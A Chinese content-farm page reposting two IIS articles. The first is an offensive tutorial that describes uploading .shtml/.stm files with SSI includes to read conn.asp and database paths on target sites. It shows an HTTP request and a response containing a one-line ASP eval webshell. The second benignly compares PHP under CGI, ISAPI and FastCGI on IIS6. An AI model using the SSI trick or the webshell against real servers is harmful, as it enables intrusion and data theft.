当前位置：首页 > 实用文档 > 其他范文> IIS下另外一个危险的ISAPI扩展

IIS下另外一个危险的ISAPI扩展

时间：2023-08-13 07:58:23 其他范文收藏本文下载本文

IIS下另外一个危险的ISAPI扩展（精选3篇）由网友“阿柴的树洞”投稿提供，以下是小编精心整理的IIS下另外一个危险的ISAPI扩展，希望对大家有所帮助。

IIS下另外一个危险的ISAPI扩展

篇1：IIS下另外一个危险的ISAPI扩展

我们先来看一份关于SSI的介绍：

SSI有什么用?

之所以要扯到ssi，是因为shtml--server-parsed HTML 的首字母缩略词，包含有嵌入式服务器方包含命令的 HTML 文本。在被传送给浏览器之前，服务器会对 SHTML 文档进行完全地读取、分析以及修改。

shtml和asp 有一些相似，以shtml命名的文件里，使用了ssi的一些指令，就像asp中的指令，你可以在SHTML文件中写入SSI指令，当客户端访问这些shtml文件时，服务器端会把这些SHTML文件进行读取和解释，把SHTML文件中包含的SSI指令解释出来

比如：你可以在SHTML文件中用SSI指令引用其他的html文件（#include ），服务器传送给客户端的文件，是已经解释的SHTML不会有SSI指令。它实现了HTML所没有的功能，就是可以实现了动态的SHTML，可以说是HTML的一种进化吧。像新浪的新闻系统就是这样的，新闻内容是固定的但它上面的广告和菜单等就是用#include引用进来的。

目前，主要有以下几种用用途：

1、显示服务器端环境变量<#echo>

2、将文本内容直接插入到文档中<#include>

3、显示WEB文档相关信息<#flastmod #fsize>(如文件制作日期/大小等)

4、直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)

5、设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式) 高级SSI可设置变量使用if条件语句

大家都知道ISAPI在默认情况下有很多危险的扩展，比如：

ASP ASA CER CDX，都可以执行ASP脚本代码

在程序不允许上传这些扩展的情况下我们可以上传一个stm文件或者shtml, 内容为:

直接请求这个stm文件或者shtml文件, conn.asp就一览无遗, 数据库路径也就到手啦!

并且又看了那篇shtml的介绍后，恍然大悟，终于明白了！

原来就是如上所说的，

就是一条SSI指令，其作用是将“conn.asp”的内容拷贝到当前的页面中，当访问者来浏览时，会看到其它HTML文档一样显示conn.asp其中的内容，

我在本地试验成功！在我的iis目录下建了一个test.shtml文件，内容为：

又在同一目录下放了一个我的一个木马文件ok.asp

在浏览器中请求test.shtml，没有什么反映，一片空白。

但是一查看源代码，狂晕，原来就是我的asp文件的内容！

这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径，

但是一个前提是服务器的对stm或者shtml的扩展没有删除,还有一个就是必须开启“在服务端包含文件”WEB服务扩展。

GET /test.shtml HTTP/1.1

Accept: */*

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)

Host: 221.195.40.43

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 14 Aug 01:57:18 GMT

Server: Microsoft-IIS/6.0

Content-Length: 22

Content-Type: text/html

<%eval(request(“#”))%>

篇2：IIS下PHP的ISAPI和FastCGI比较

在Windows IIS 6.0下配置PHP，通常有CGI、ISAPI和FastCGI三种配置方式，这三种模式都可以在IIS 6.0下成功运行，下面我就讲一下这三种方式配置的区别和性能上的差异，

1、CGI（通用网关接口/Common Gateway Interface）一般是可执行程序，例如EXE文件，和WEB服务器各自占据着不同的进程,而且一般一个CGI程序只能处理一个用户请求。这样，当用户请求数量非常多时，会大量占用系统的资源，如内存、CPU时间等，造成效能低下。

2、ISAPI（Internet Server Application Program Interface）是微软提供的一套面向WEB服务的API接口，它能实现CGI提供的全部功能，并在此基础上进行了扩展，如提供了过滤器应用程序接口。ISAPI应用大多数以DLL动态库的形式使用，可以在被用户请求后执行，，在处理完一个用户请求后不会马上消失，而是继续驻留在内存中等待处理别的用户输入。此外,ISAPI的DLL应用程序和WEB服务器处于同一个进程中，效率要显著高于CGI。

在Windows Server 的IIS6下配置ISAPI方式的PHP，配置方法是，在IIS的“WEB服务扩展”中，添加一个新的WEB服务扩展，程序后缀为PHP，ISAPI程序为php5isapi.dll，然后再“环境变量”-“系统变量”中增加变量名PHPRC，数值为php.ini的路径，在Internet信息服务管理器中，选择网站或应用程序的根目录，打开目录属性页（右键选择“属性”），再选择“主目录”。点击“配置”按钮，选择“映射”Tab页。点击“添加...”，在“可执行文件”设为: c:\php\php5isapi.dll，扩展名设为.php，选择“确认文件是否存在”，然后“确定”保存设置。重启服务器即可完成PHP的配置。

3、FastCGI是可伸缩架构的CGI开放扩展，其主要行为是将CGI解释器进程保持在内存中并因此获得较高的性能。传统的CGI解释器的反复加载是CGI性能低下的主要原因，如果CGI解释器保持在内存中并接受FastCGI进程管理器调度，则可以提供良好的性能、伸缩性等，

FastCGI已经集成于IIS7，也支持IIS6，在IIS6中的安装方法可参见微软的官方文档，我这里简单翻译一下。

先点这里下载一个32位的FastCGI extension for IIS，然后将其安装，安装后的文件应该放到system32\inetsrv目录下。

之后打开system32\inetsrv目录，执行下面的语句，其中c:\php为你的PHP目录，可以修改为其他数值。

cscript. fcgiconfig.js -add -section:“PHP” -extension:php -path:“c:\php\php-cgi.exe”

在Internet信息服务管理器中，选择网站或应用程序的根目录，打开目录属性页（右键选择“属性”），再选择“主目录”。点击“配置”按钮，选择“映射”Tab页。点击“添加...”，在“可执行文件”设为: c:\windows\system32\inetsrv\fcgiext.dll，扩展名设为.php，选择“确认文件是否存在”，然后“确定”保存设置。

修改php.ini文件，增加如下语句：

fastcgi.impersonate = 1

cgi.fix_pathinfo = 1

cgi.force_redirect = 0

之后打开system32\inetsrv目录，执行以下语句：

cscript. fcgiconfig.js -set -section:“PHP” -InstanceMaxRequests:10000

cscript. fcgiconfig.js -set -section:“PHP” -EnvironmentVars:PHP_FCGI_MAX_REQUESTS:10000

最后，配置c:\php目录的安全性，使得IIS_WPG组对于这个目录有读取和执行的权限。

这时候，基于FastCGI的PHP就成功配置到IIS6上了。

不过根据我自己的测试，FastCGI的性能比ISAPI的好像高不了多少，不知道Windows Server 下的IIS7是不是会好一些。这里是微软提供的基于内置FastCGI的IIS7安装PHP的方法。